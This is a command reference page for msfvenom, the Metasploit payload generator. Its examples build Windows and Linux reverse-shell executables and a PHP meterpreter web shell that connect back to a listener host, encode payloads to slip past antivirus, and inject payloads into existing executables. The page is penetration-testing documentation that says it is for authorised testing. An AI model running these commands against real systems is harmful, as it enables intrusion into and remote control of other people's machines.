LinuxCommandLibrary
GitHubF-DroidGoogle Play Store

msfvenom

generates payloads for Metasploit

TLDR

List payloads
$ msfvenom -l payloads
copy
List encoders
$ msfvenom -l encoders
copy
Generate Windows reverse shell
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[192.168.1.10] LPORT=[4444] -f exe > [shell.exe]
copy
Generate Linux payload
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=[192.168.1.10] LPORT=[4444] -f elf > [shell.elf]
copy
Encode payload
$ msfvenom -p [payload] -e x86/shikata_ga_nai -i [5] -f exe > [encoded.exe]
copy
Generate shellcode
$ msfvenom -p [payload] -f c
copy
Generate web payload
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[port] -f raw > [shell.php]
copy

SYNOPSIS

msfvenom [options]

DESCRIPTION

msfvenom generates payloads for Metasploit. It combines msfpayload and msfencode functionality.The tool creates shellcode and executables. Supports encoding and format conversion.

PARAMETERS

-p PAYLOAD

Payload to use. Use `-` for stdin.
-f FORMAT
Output format (exe, elf, raw, c, python, powershell, etc.).
-e ENCODER
Encoder to use.
-i COUNT
Number of encoding iterations.
-l TYPE
List available items (payloads, encoders, nops, formats, all).
-a ARCH
Target architecture (x86, x64, arm, etc.).
--platform PLATFORM
Target platform (windows, linux, osx, android, etc.).
-b CHARS
Characters to avoid in the payload (bad chars).
-o FILE
Save the payload to a file.
-x FILE
Use a custom executable as a template.
-k
Keep the template's functionality and inject payload as a new thread.
-n LENGTH
Prepend a nopsled of the given length.
-s SIZE
Maximum payload size in bytes.
--smallest
Generate the smallest possible payload.
LHOST
Local host address (payload variable).
LPORT
Local port number (payload variable).
--help
Display help information.

CAVEATS

Authorized testing only. AV may detect payloads. Part of Metasploit Framework.

HISTORY

msfvenom replaced msfpayload and msfencode in Metasploit Framework, unifying payload generation.

SEE ALSO

msfconsole(1), msfpc(1), nmap(1)

Copied to clipboard
Kai